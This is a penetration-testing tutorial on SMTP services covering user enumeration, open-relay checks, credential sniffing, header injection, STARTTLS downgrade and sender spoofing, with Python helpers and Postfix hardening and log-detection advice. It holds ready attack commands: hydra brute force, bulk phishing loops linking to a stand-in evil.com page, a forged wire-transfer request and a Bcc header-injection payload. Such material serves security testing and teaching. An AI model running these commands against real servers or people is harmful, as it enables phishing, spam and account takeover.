25/465/587 - SMTP Service Penetration Testing

Service overview

SMTP (Simple Mail Transfer Protocol) carries mail from clients to servers (submission) and between servers (relay). Misconfiguration leads to user enumeration, open-relay abuse (spam and phishing sent through the target's infrastructure and reputation), and credential exposure.

Default ports: 25 (SMTP, server-to-server), 465 (SMTPS, implicit TLS), 587 (Submission, STARTTLS + AUTH)
Risk level: ⭐⭐⭐


Information gathering

Service identification

# nmap scan
nmap -sV --script smtp-commands,smtp-enum-users,smtp-open-relay -p 25,465,587 TARGET

# Manual connection
nc TARGET 25
EHLO attacker.com

# Example output:
# 220 mail.target.com ESMTP Postfix
# 250-mail.target.com
# 250-SIZE 10240000
# 250-AUTH LOGIN PLAIN
# 250-STARTTLS
# 250 8BITMIME
# What the EHLO reply tells you: the software (banner), which AUTH mechanisms are offered
# on a plaintext session (here LOGIN and PLAIN before any TLS), and whether STARTTLS is advertised.

User enumeration

# VRFY command (verify a mailbox)
nc TARGET 25
HELO attacker.com
VRFY admin
# 250 <[email protected]>  - user exists
# 550 User unknown         - user does not exist
# 252 Cannot VRFY user     - accepted without confirmation. Postfix answers 252 for any address
#                            its recipient checks accept and 550 for ones they reject, so 252 vs 550
#                            still enumerates; a server that answers 252 for everything does not.

# EXPN command (expand a mailing list or alias)
nc TARGET 25
HELO attacker.com
EXPN developers
# 250 [email protected]
# 250 [email protected]
# Postfix does not implement EXPN at all (502 reply); expect it on Sendmail or Exim.

# RCPT TO test (works even when VRFY/EXPN are disabled, provided the server rejects
# unknown local recipients at RCPT time instead of accepting everything and bouncing later)
HELO attacker.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
# 250 OK           - user exists
# 550 User unknown - user does not exist
# If every address gets 250 (catch-all domain, or rejection deferred to after DATA), RCPT enumeration yields nothing.

Automated enumeration

# smtp-user-enum
smtp-user-enum -M VRFY -U users.txt -t TARGET
smtp-user-enum -M EXPN -U users.txt -t TARGET
smtp-user-enum -M RCPT -U users.txt -t TARGET

# nmap script (quote the braces, otherwise the shell brace-expands them into three arguments)
nmap --script smtp-enum-users --script-args 'smtp-enum-users.methods={VRFY,EXPN,RCPT}' -p 25 TARGET

# hydra brute force against SMTP AUTH (add -S for implicit TLS on 465)
hydra -l admin -P passwords.txt smtp://TARGET

Common attack techniques

1. Open relay

Principle: the server accepts mail from an outside sender to an outside recipient without authentication, so anyone can send through it (spam, phishing that arrives from the target's IP and passes the target's SPF). The decisive check is RCPT TO for a domain the server is not responsible for: a 250 there, followed by a 250 after the terminating "." of DATA, means the message was accepted for relaying.

Detection:

# nmap check (tries the classic sender/recipient combinations)
nmap --script smtp-open-relay -p 25 TARGET

# Manual test
nc TARGET 25
HELO attacker.com
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Test
This is a test message.
.
# 250 on RCPT TO and again after the final "." means open relay. A server that gives 250 to RCPT
# but 550/554 after DATA, or that accepts only recipients in its own domains, is not one.
# Also test from inside the network if you can: mynetworks is often wide enough that the
# relay is open from the LAN while closed from the Internet.

Exploitation:

# Send a phishing mail through the relay
sendemail -f [email protected] -t [email protected] \
  -u "Urgent: Password Reset" \
  -m "Click here to reset your password: http://evil.com/phish" \
  -s TARGET:25

# Bulk send (one address per line in victims.txt)
while read -r email; do
    sendemail -f [email protected] -t "$email" \
      -u "Account Verification" \
      -m "Please verify your account" \
      -s TARGET:25
done < victims.txt
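The enumeration section and the open-relay test above are the same dialogue with different verbs. The following is an added example, not code from the original page: one small SMTP session class, VRFY/EXPN/RCPT enumeration with the reply-code verdicts described above (including the 252 case), and the four sender/recipient combinations of the classic relay test. `TARGET`, `attacker.com` and the probe addresses are placeholders; the `talk` callable is passed in so the logic can also be driven by a scripted fake instead of a live server.

```python
import socket
from typing import Callable, Dict, List, Tuple

# A "talk" function sends one command line and returns (reply code, reply text).
# Real sessions use SmtpSession.cmd; tests can pass a fake that answers from a table.
Talk = Callable[[str], Tuple[int, str]]


class SmtpSession:
    """Minimal plaintext SMTP client: one command in, one (possibly multi-line) reply out."""

    def __init__(self, host: str, port: int = 25, timeout: float = 10.0) -> None:
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rfile = self.sock.makefile("rb")
        self.banner = self.read_reply()            # 220 greeting, often leaks software

    def read_reply(self) -> Tuple[int, str]:
        texts = []
        while True:
            raw = self.rfile.readline()
            if not raw:
                raise ConnectionError("connection closed by server")
            line = raw.decode("utf-8", "replace").rstrip("\r\n")
            texts.append(line[4:])
            if len(line) < 4 or line[3] != "-":    # "250-" continues, "250 " ends the reply
                return int(line[:3]), "\n".join(texts)

    def cmd(self, line: str) -> Tuple[int, str]:
        self.sock.sendall((line + "\r\n").encode())
        return self.read_reply()

    def close(self) -> None:
        try:
            self.cmd("QUIT")
        finally:
            self.sock.close()


def classify(code: int) -> str:
    """Enumeration verdict from the reply code (252 only means something next to a 550)."""
    if code in (250, 251):
        return "exists"
    if code == 252:
        return "unverified"                        # accepted without confirmation
    if code in (550, 551, 553):
        return "unknown"
    if code in (500, 501, 502, 503):
        return "unsupported"                       # command disabled or not implemented
    return "unclear"


def enumerate_users(talk: Talk, users: List[str], method: str,
                    helo: str = "attacker.com", domain: str = "") -> Dict[str, str]:
    """VRFY, EXPN or RCPT enumeration through `talk`; returns user -> verdict."""
    method = method.upper()
    talk(f"HELO {helo}")
    if method == "RCPT":
        talk(f"MAIL FROM:<probe@{helo}>")
    verdicts = {}
    for user in users:
        if method == "RCPT":
            rcpt = f"{user}@{domain}" if domain else user
            code, _ = talk(f"RCPT TO:<{rcpt}>")
        else:
            code, _ = talk(f"{method} {user}")
        verdicts[user] = classify(code)
    if method == "RCPT":
        talk("RSET")                               # drop the envelope we built up
    return verdicts


# Sender/recipient combinations of the classic relay test; only the last one
# (inbound mail for a local mailbox) should be accepted by a correctly configured server.
RELAY_PROBES = [
    ("outside->outside", "{ext}", "{ext}"),
    ("local->outside",   "{loc}", "{ext}"),
    ("empty->outside",   "",      "{ext}"),
    ("outside->local",   "{ext}", "{loc}"),
]


def check_open_relay(talk: Talk, local_addr: str, external_addr: str) -> Dict[str, bool]:
    """Probe name -> True when the server accepted RCPT TO (250/251)."""
    talk("HELO attacker.com")
    accepted = {}
    for name, frm, to in RELAY_PROBES:
        talk("RSET")
        sender = frm.format(ext=external_addr, loc=local_addr)
        code, _ = talk(f"MAIL FROM:<{sender}>")
        if code == 250:
            code, _ = talk(f"RCPT TO:<{to.format(ext=external_addr, loc=local_addr)}>")
        accepted[name] = code in (250, 251)
    return accepted


def is_open_relay(accepted: Dict[str, bool]) -> bool:
    """Any accepted probe with an outside recipient means the server relays for strangers."""
    return any(ok for name, ok in accepted.items() if name.endswith("->outside"))


if __name__ == "__main__":                         # TARGET and the addresses are placeholders
    session = SmtpSession("TARGET", 25)
    print(enumerate_users(session.cmd, ["admin", "root", "nobody"], "VRFY"))
    print(check_open_relay(session.cmd, "postmaster@target.com", "probe@attacker.com"))
    session.close()
```

The relay check stops at RCPT TO on purpose: no DATA is sent, so nothing is actually relayed during the test. If you need the stricter "accepted after DATA" confirmation described above, send a DATA block to a mailbox you control and watch for delivery.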

2. Credential theft

Principle: AUTH PLAIN and AUTH LOGIN only base64-encode the credentials; nothing is encrypted. If the server offers AUTH on a plaintext session (as in the EHLO reply above) or clients do not insist on TLS, anyone on the path can read the username and password.

Exploitation:

# 1. Sniff the traffic (Wireshark field names are smtp.req.command and smtp.req.parameter)
tshark -i eth0 -Y "smtp" -T fields -e smtp.req.command -e smtp.req.parameter

# 2. Decode the base64
# AUTH PLAIN: a single blob that decodes to  authzid\0username\0password  (authzid is usually empty)
echo "BASE64_CREDENTIALS" | base64 -d | cat -v
# Output: ^@username^@password
# AUTH LOGIN: the server prompts "334 VXNlcm5hbWU6" (Username:) and "334 UGFzc3dvcmQ6" (Password:),
# the client answers each with its own base64 blob; decode the two client replies separately.

# 3. Brute force (online; throttle it, lockouts and failed-login logs are the usual giveaway)
hydra -l admin -P passwords.txt smtp://TARGET
hydra -C userpass.txt smtp://TARGET

# 4. Use the captured credentials on the submission port
sendemail -f [email protected] -t [email protected] \
  -xu admin -xp password \
  -u "Important" -m "Message" -s TARGET:587

3. Mail header injection

Principle: an application builds a message by concatenating user input (contact-form subject, reply address) into header lines. If CR/LF in the input is not rejected, the attacker ends the current header and appends more (Bcc, extra To, a second Subject), or a blank line followed by a body of their choosing. The injected Bcc only reaches the extra recipients when the message is handed to something that reads recipients out of the headers, such as PHP mail() invoking sendmail -t; with an explicit envelope (smtplib.sendmail with a recipient list) the injected header merely shows up in the delivered message.

Exploitation:

# Python illustration of the vulnerable pattern: headers assembled by string
# concatenation, and an injected subject that smuggles in two Bcc headers.
# Python's email package refuses embedded headers (HeaderParseError from
# MIMEText.as_string(), ValueError from EmailMessage), so it cannot be used
# to reproduce the bug; the application has to be building raw text.
import smtplib

# malicious value submitted in the "subject" field
subject = "Test\nBcc:[email protected]\nBcc:[email protected]"
body = "Message body"

# vulnerable builder: the field goes into the header block without a CR/LF check
raw = (
    "From: [email protected]\n"
    "To: [email protected]\n"
    f"Subject: {subject}\n"
    "\n"
    f"{body}\n"
)

# envelope recipients are explicit here, so the Bcc is only honoured if the receiving
# pipeline re-extracts recipients from the headers (sendmail -t style submission)
server = smtplib.SMTP('TARGET', 25)
server.sendmail('[email protected]', ['[email protected]'], raw)
server.quit()
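To make the effect of the injection concrete, and to show the fix, here is an added example (not part of the original page) that computes which addresses a header-reading submission path such as sendmail -t would deliver to, beside a hardened builder that rejects CR/LF explicitly and also relies on the email library's own refusal of multi-line header values. Addresses are placeholders.

```python
import email
import email.utils
from email.message import EmailMessage
from typing import List


def build_unsafe(sender: str, recipient: str, subject: str, body: str) -> str:
    """Vulnerable: the subject goes into the header block unchecked."""
    return f"From: {sender}\nTo: {recipient}\nSubject: {subject}\n\n{body}\n"


def header_recipients(raw_message: str) -> List[str]:
    """Addresses a 'sendmail -t' style path would deliver to: To, Cc and Bcc headers."""
    msg = email.message_from_string(raw_message)
    found = []
    for name in ("To", "Cc", "Bcc"):
        for _, addr in email.utils.getaddresses(msg.get_all(name, [])):
            if addr:
                found.append(addr)
    return found


def build_safe(sender: str, recipient: str, subject: str, body: str) -> str:
    """Hardened: reject any line break in a header field before it reaches the message.
    EmailMessage (default policy) raises ValueError on such values as well, so even
    without the explicit check no header could be smuggled in."""
    for field, value in (("sender", sender), ("recipient", recipient), ("subject", subject)):
        if "\r" in value or "\n" in value:
            raise ValueError(f"line break in {field}: header injection attempt")
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    return msg.as_string()


def library_rejects(subject: str) -> bool:
    """True when EmailMessage alone (no manual check) refuses the subject value."""
    msg = EmailMessage()
    try:
        msg["Subject"] = subject
    except ValueError:
        return True
    return False
```

When reviewing an application, `header_recipients(build_unsafe(...))` on a crafted subject is the quickest demonstration of impact; the fix is whichever of the two layers in `build_safe` the codebase can adopt, ideally both.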

4. STARTTLS downgrade

Principle: STARTTLS is opportunistic. The client connects in plaintext, reads the EHLO reply, and upgrades only if 250-STARTTLS is advertised. An active attacker on the path strips that line from the reply (or answers the STARTTLS command with an error); a client that then falls back to plaintext sends AUTH LOGIN/PLAIN in the clear. Port 465 (implicit TLS) has no such negotiation and is not affected.

Exploitation:

# 1. Get on the path (ARP spoofing, rogue access point, compromised router) with a
#    TCP-level MITM that can rewrite the SMTP stream
# 2. Drop "250-STARTTLS" from the EHLO reply, or reject the STARTTLS command
#    (clients configured for "use TLS if available" carry on in plaintext)
# 3. Sniff the credentials from the now-plaintext AUTH exchange
tshark -i eth0 -Y "smtp" -T fields -e smtp.auth.username -e smtp.auth.password

# Defence: make TLS mandatory on both ends
# Server: smtpd_tls_auth_only = yes (Postfix) so AUTH is never offered on a plaintext session,
#         and security level "encrypt" on the submission port
# Client: configure "require STARTTLS" rather than "use if available", and verify the certificate
# Server-to-server: MTA-STS or DANE let the receiving domain declare that TLS is required
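The two halves of this section, reading an EHLO reply during identification and the client-side defence against the downgrade, fit in one added example (not from the original page). `parse_ehlo` turns the reply lines shown earlier into an extension table, `assess` records the findings a tester would note from a plaintext EHLO, and `submit_fail_closed` is a client that refuses to authenticate unless STARTTLS is offered and the certificate verifies. Host, port and credentials are placeholders; only the parsing functions run without a server.

```python
import smtplib
import ssl
from typing import Dict, List


def parse_ehlo(reply_lines: List[str]) -> Dict[str, str]:
    """['250-mail.target.com', '250-AUTH LOGIN PLAIN', '250-STARTTLS', '250 8BITMIME']
    -> {'AUTH': 'LOGIN PLAIN', 'STARTTLS': '', '8BITMIME': ''}.
    The first line carries the server hostname, not an extension."""
    exts: Dict[str, str] = {}
    for line in reply_lines[1:]:
        if len(line) < 4 or not line.startswith("250"):
            continue
        body = line[4:].strip()
        if not body:
            continue
        name, _, args = body.partition(" ")
        exts[name.upper()] = args
    return exts


def assess(exts: Dict[str, str]) -> List[str]:
    """Findings from a plaintext EHLO, in the order a report would list them."""
    findings = []
    if "STARTTLS" not in exts:
        findings.append("no STARTTLS advertised: session stays plaintext (or the capability was stripped)")
    if "AUTH" in exts:
        clear = [m for m in exts["AUTH"].split() if m in ("PLAIN", "LOGIN")]
        if clear:
            findings.append("AUTH " + " ".join(clear) + " offered before TLS: credentials sniffable")
    return findings


def submit_fail_closed(host: str, port: int, user: str, password: str) -> None:
    """Client side of the defence: require STARTTLS, verify the certificate, only then AUTH.
    A stripped EHLO makes this raise instead of silently logging in over plaintext."""
    ctx = ssl.create_default_context()          # verifies chain and hostname
    with smtplib.SMTP(host, port, timeout=15) as s:
        s.ehlo()
        if not s.has_extn("starttls"):
            raise RuntimeError("server did not offer STARTTLS; refusing plaintext AUTH")
        s.starttls(context=ctx)
        s.ehlo()                                 # re-EHLO after TLS: the capability list changes
        s.login(user, password)
```

Run `assess(parse_ehlo(lines))` on the reply captured with nc during identification; an empty list is what a hardened submission port should produce, since AUTH should not appear at all until after STARTTLS.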

5. Sender spoofing through weak SPF/DKIM/DMARC

Principle: SPF lists the IPs allowed to send for a domain, DKIM signs the message, and DMARC tells receivers what to do when neither result aligns with the From: header. A missing or permissive setup (no SPF, +all or ~all, no DMARC or p=none) means a forged From: in the target's domain is delivered rather than rejected.

Detection:

# Check SPF
dig +short target.com TXT
# v=spf1 include:_spf.google.com ~all
# ~all = softfail (receivers usually only mark), +all = anyone may send, -all = hard fail

# Check DKIM (the selector is site-specific; "default" is just a common guess, real ones
# appear in the s= tag of the DKIM-Signature header of any genuine mail from the domain)
dig +short default._domainkey.target.com TXT

# Check DMARC
dig +short _dmarc.target.com TXT
# v=DMARC1; p=none; rua=mailto:[email protected]
# p=none = monitoring only, spoofed mail is still delivered; p=quarantine / p=reject enforce

Exploitation:

# With ~all and no enforcing DMARC a forged sender is typically accepted (at worst it
# lands in spam). Note that when you deliver straight to the target's MX, as below, the
# MX evaluates SPF against your source IP; the forgery gets through because the policy
# is permissive or because the server does not check its own domain on inbound mail.

sendemail -f [email protected] -t [email protected] \
  -u "Urgent: Wire Transfer" \
  -m "Please process this wire transfer immediately" \
  -s TARGET:25

# If SPF and DKIM are absent entirely there is nothing for the receiver to evaluate,
# DMARC (if present) cannot produce a pass, and with p=none the mail goes through.
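The dig checks above are judged by eye; the following added example (not part of the original page) turns the same reading of the records into code. `parse_spf` and `parse_dmarc` take the TXT record strings, `spoofability` lists the weaknesses for a domain, and `check_domain` fetches the records by shelling out to dig (assumed installed; it is the only part that needs the network). The record strings in the test are constructed samples.

```python
import subprocess
from typing import Dict, List, Optional


def parse_spf(record: str) -> Optional[Dict[str, object]]:
    """Split an SPF record into its mechanisms and the qualifier of its 'all' term."""
    if not record.lower().startswith("v=spf1"):
        return None
    mechanisms, all_qualifier = [], None
    for term in record.split()[1:]:
        if term.lower().lstrip("+-~?") == "all":
            all_qualifier = term[0] if term[0] in "+-~?" else "+"   # bare "all" means "+all"
        else:
            mechanisms.append(term)
    return {"mechanisms": mechanisms, "all": all_qualifier}


def parse_dmarc(record: str) -> Optional[Dict[str, str]]:
    """'v=DMARC1; p=none; rua=mailto:x' -> {'v': 'DMARC1', 'p': 'none', 'rua': 'mailto:x'}."""
    if not record.lower().startswith("v=dmarc1"):
        return None
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        key, _, value = part.strip().partition("=")
        if key:
            tags[key.strip().lower()] = value.strip()
    return tags


def spoofability(spf: Optional[str], dmarc: Optional[str]) -> List[str]:
    """Findings for (SPF record, DMARC record); None stands for 'no record published'."""
    findings = []
    s = parse_spf(spf) if spf else None
    d = parse_dmarc(dmarc) if dmarc else None
    if s is None:
        findings.append("no SPF: any host can send for the domain")
    elif s["all"] in (None, "+"):
        findings.append("SPF ends in +all or has no all term: every sender passes")
    elif s["all"] == "~":
        findings.append("SPF softfail (~all): forged mail is marked, not rejected")
    elif s["all"] == "?":
        findings.append("SPF neutral (?all): no assertion, treated like no record")
    if d is None:
        findings.append("no DMARC: receivers apply no policy on From: alignment")
    elif d.get("p", "none") == "none":
        findings.append("DMARC p=none: monitoring only, spoofed mail still delivered")
    elif d.get("sp") == "none":
        findings.append("DMARC sp=none: subdomains can be spoofed")
    return findings


def lookup_txt(name: str) -> List[str]:
    """TXT records via dig; a record split into several quoted chunks is joined back up."""
    out = subprocess.run(["dig", "+short", name, "TXT"],
                         capture_output=True, text=True, check=False).stdout
    return [line.replace('" "', "").strip().strip('"') for line in out.splitlines() if line.strip()]


def check_domain(domain: str) -> List[str]:
    spf = next((r for r in lookup_txt(domain) if r.lower().startswith("v=spf1")), None)
    dmarc = next((r for r in lookup_txt("_dmarc." + domain) if r.lower().startswith("v=dmarc1")), None)
    return spoofability(spf, dmarc)
```

An empty list from `spoofability` (hard-fail SPF plus an enforcing DMARC) is the state the hardening section at the end of this page aims for; anything else is a reportable finding, with p=none the most common one.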

Case studies

Case 1: user enumeration + brute force

# 1. Enumerate valid users
smtp-user-enum -M VRFY -U common_users.txt -t TARGET

# Output:
# VRFY [email protected] ... 250 <[email protected]>
# VRFY [email protected] ... 250 <[email protected]>
# VRFY [email protected] ... 550 User unknown

# 2. Save the valid users
echo "[email protected]" > valid_users.txt
echo "[email protected]" >> valid_users.txt

# 3. Brute force (only confirmed accounts, which keeps lockouts and log noise down)
hydra -L valid_users.txt -P rockyou.txt smtp://TARGET

# 4. Credentials obtained
# admin:Password123!

Case 2: open relay abuse

# 1. Confirm the open relay
nmap --script smtp-open-relay -p 25 TARGET

# 2. Send a phishing mail
sendemail -f [email protected] -t [email protected] \
  -u "Account Suspended" \
  -m "Your account has been suspended. Click here: http://evil.com/phish" \
  -s TARGET:25

# 3. Bulk send
while read -r email; do
    sendemail -f [email protected] -t "$email" \
      -u "Order Confirmation" \
      -m "Your order has been shipped" \
      -s TARGET:25
done < victim_list.txt

Case 3: internal mail reconnaissance

# 1. Connect to SMTP
nc TARGET 25
EHLO attacker.com

# 2. Harvest internal information
# 220 mail.internal.target.com ESMTP
# the banner hostname leaks the internal domain name; the Received: headers of any bounce
# the server returns reveal internal hops and addresses as well

# 3. Enumerate mailing lists
VRFY postmaster
EXPN all-staff

# 4. Collect the addresses
# for later phishing

Case 4: credential reuse

# 1. Obtain SMTP credentials
# by sniffing or brute force

# 2. Test the same credentials on other services
hydra -l admin -p Password123! ssh://TARGET
hydra -l admin -p Password123! ftp://TARGET
hydra -l admin -p Password123! imap://TARGET

# 3. Send authenticated mail as the user (reading the mailbox is IMAP/POP3, not SMTP)
sendemail -xu admin -xp Password123! \
  -f [email protected] -t [email protected] \
  -u "Test" -m "Testing" -s TARGET:587

Tools

smtp-user-enum

# VRFY enumeration
smtp-user-enum -M VRFY -U users.txt -t TARGET

# EXPN enumeration
smtp-user-enum -M EXPN -U users.txt -t TARGET

# RCPT TO enumeration
smtp-user-enum -M RCPT -U users.txt -t TARGET

# Multiple targets
smtp-user-enum -M VRFY -U users.txt -T targets.txt

swaks (SMTP test tool)

# Send a test mail
swaks --to [email protected] --from [email protected] --server TARGET

# Authenticated send
swaks --to [email protected] --from [email protected] \
  --server TARGET --auth-user admin --auth-password pass

# Open relay test (outside sender to outside recipient)
swaks --to [email protected] --from [email protected] \
  --server TARGET --header "Subject: Test"

nmap scripts

# SMTP command enumeration
nmap --script smtp-commands -p 25 TARGET

# User enumeration
nmap --script smtp-enum-users -p 25 TARGET

# Open relay detection
nmap --script smtp-open-relay -p 25 TARGET

# TLS configuration (certificate and cipher suites; the scripts negotiate STARTTLS on 25/587)
nmap --script ssl-cert,ssl-enum-ciphers -p 25,465,587 TARGET

Metasploit

# SMTP user enumeration
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS TARGET
set USER_FILE users.txt
run

# Open relay detection
use auxiliary/scanner/smtp/smtp_relay
set RHOSTS TARGET
run

Hardening recommendations

Server configuration

# Postfix (main.cf)

# 1. Disable VRFY (Postfix has no EXPN, so there is nothing to disable there) and
#    reject malformed or unlisted addresses early
disable_vrfy_command = yes
smtpd_recipient_restrictions =
    reject_unknown_recipient_domain,
    reject_unauth_pipelining,
    reject_non_fqdn_sender,
    reject_non_fqdn_recipient

# 2. Restrict relaying: only local networks and authenticated clients may send to outside
#    domains. Keep mynetworks tight; a /24 that contains untrusted hosts re-opens the
#    relay from the inside.
mynetworks = 127.0.0.0/8, 192.168.1.0/24
relay_domains = $mydestination
smtpd_relay_restrictions =
    permit_mynetworks,
    permit_sasl_authenticated,
    defer_unauth_destination

# 3. Authentication: PLAIN/LOGIN only inside a TLS session
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous, noplaintext
smtpd_sasl_tls_security_options = noanonymous

# 4. Encryption: never offer AUTH on a plaintext session. "encrypt" belongs on the
#    submission port (587, set with -o smtpd_tls_security_level=encrypt in master.cf);
#    on port 25 it would refuse the many MTAs that still deliver without TLS, so keep "may" there.
smtpd_tls_security_level = may
smtpd_tls_auth_only = yes

# 5. Rate limiting (anvil)
smtpd_client_connection_rate_limit = 10
smtpd_client_recipient_rate_limit = 50

SPF/DKIM/DMARC

# 1. SPF record (DNS TXT on the domain): list the real senders, end with hard fail
v=spf1 include:_spf.google.com -all

# 2. DKIM signing
# sign outgoing mail with OpenDKIM (milter) and publish the public key at
# <selector>._domainkey.target.com; rotate the key and selector periodically

# 3. DMARC policy
# DNS TXT record (_dmarc.target.com); start with p=none to collect reports, then move to
# quarantine and finally reject once every legitimate sender passes
v=DMARC1; p=reject; rua=mailto:[email protected]

Monitoring and detection

# 1. Log review (Postfix logs sasl_username= on accepted authenticated sessions and
#    "SASL ... authentication failed" on failures; there is no "auth=" token)
grep "relay=" /var/log/mail.log
grep "sasl_username=" /var/log/mail.log
grep "authentication failed" /var/log/mail.log

# 2. Anomalies worth alerting on
# one account suddenly sending to large numbers of external recipients
# successful authentication from an IP never seen before for that user
# bursts of failed logins (one IP against many users, or one user from many IPs)
# relay= lines to destinations outside your own domains from unauthenticated clients

# 3. Traffic analysis
tshark -i eth0 -Y "smtp" -T fields -e ip.src -e smtp.req.command
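The three anomalies listed above, computed from Postfix log lines, as an added example that is not part of the original page. The log lines are constructed samples in the usual Postfix smtpd/smtp format (a brute-force run against one host, an `admin` login from that same outside IP followed by an outbound burst, and a normal internal session); the thresholds and the `known_ips` baseline are placeholders to be tuned per environment.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, List, Optional, Set

# Postfix patterns; the syslog prefix is not anchored, so real lines match as well
AUTH_FAIL = re.compile(r"warning: \S+\[(?P<ip>[\d.:a-fA-F]+)\]: SASL \w+ authentication failed")
AUTH_OK = re.compile(r"client=\S+\[(?P<ip>[\d.:a-fA-F]+)\].*sasl_username=(?P<user>\S+)")
SUBMITTED = re.compile(r"postfix/smtpd\[\d+\]: (?P<qid>\w+): client=.*sasl_username=(?P<user>\S+)")
RELAYED = re.compile(r"postfix/smtp\[\d+\]: (?P<qid>\w+): to=<(?P<to>[^>]+)>, relay=(?P<relay>\S+)")

# constructed sample log (not real traffic)
SAMPLE_LOG = """\
Jan 10 09:00:01 mx postfix/smtpd[1201]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jan 10 09:00:02 mx postfix/smtpd[1201]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jan 10 09:00:03 mx postfix/smtpd[1201]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jan 10 09:00:04 mx postfix/smtpd[1201]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jan 10 09:00:05 mx postfix/smtpd[1201]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: UGFzc3dvcmQ6
Jan 10 09:01:00 mx postfix/smtpd[1202]: A1B2C3D4E5: client=unknown[203.0.113.5], sasl_method=LOGIN, sasl_username=admin
Jan 10 09:01:01 mx postfix/smtp[1300]: A1B2C3D4E5: to=<v1@other.example>, relay=mx.other.example[198.51.100.7]:25, delay=0.5, dsn=2.0.0, status=sent (250 OK)
Jan 10 09:01:02 mx postfix/smtp[1300]: A1B2C3D4E5: to=<v2@other.example>, relay=mx.other.example[198.51.100.7]:25, delay=0.6, dsn=2.0.0, status=sent (250 OK)
Jan 10 09:01:03 mx postfix/smtp[1300]: A1B2C3D4E5: to=<v3@other.example>, relay=mx.other.example[198.51.100.7]:25, delay=0.6, dsn=2.0.0, status=sent (250 OK)
Jan 10 09:05:00 mx postfix/smtpd[1203]: F6E5D4C3B2: client=laptop.target.example[192.168.1.20], sasl_method=PLAIN, sasl_username=alice
Jan 10 09:05:01 mx postfix/local[1301]: F6E5D4C3B2: to=<bob@target.example>, relay=local, delay=0.1, dsn=2.0.0, status=sent (delivered to maildir)
"""


def failed_auth_by_ip(lines: Iterable[str]) -> Counter:
    """Failed SASL logins per client IP (the brute-force signal)."""
    counts: Counter = Counter()
    for line in lines:
        m = AUTH_FAIL.search(line)
        if m:
            counts[m.group("ip")] += 1
    return counts


def external_recipients_by_user(lines: List[str], own_domains: Set[str]) -> Dict[str, int]:
    """Join smtpd submissions (queue id -> sasl user) with smtp deliveries (queue id -> recipient)
    and count recipients outside our own domains per authenticated user."""
    qid_user: Dict[str, str] = {}
    for line in lines:
        m = SUBMITTED.search(line)
        if m:
            qid_user[m.group("qid")] = m.group("user")
    counts: Dict[str, int] = defaultdict(int)
    for line in lines:
        m = RELAYED.search(line)
        if m and m.group("qid") in qid_user:
            domain = m.group("to").rsplit("@", 1)[-1].lower()
            if domain not in own_domains:
                counts[qid_user[m.group("qid")]] += 1
    return dict(counts)


def alerts(lines: List[str], own_domains: Set[str], fail_threshold: int = 5,
           outbound_threshold: int = 3, known_ips: Optional[Dict[str, Set[str]]] = None) -> List[str]:
    """Brute force, never-seen login source, and outbound burst, in that order."""
    known_ips = known_ips or {}
    out = []
    for ip, n in failed_auth_by_ip(lines).items():
        if n >= fail_threshold:
            out.append(f"brute force: {n} failed SASL logins from {ip}")
    for line in lines:
        m = AUTH_OK.search(line)
        if m and m.group("ip") not in known_ips.get(m.group("user"), set()):
            out.append(f"new source: {m.group('user')} authenticated from {m.group('ip')}")
    for user, n in external_recipients_by_user(lines, own_domains).items():
        if n >= outbound_threshold:
            out.append(f"outbound burst: {user} sent to {n} external recipients")
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_LOG.splitlines(), {"target.example"}, known_ips={"alice": {"192.168.1.20"}}):
        print(a)
```

The queue-id join is the part worth copying: Postfix logs the authenticated user on the smtpd line and the recipients on the separate smtp delivery lines, so "who sent how much to whom" only exists once the two are stitched together by queue id.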

References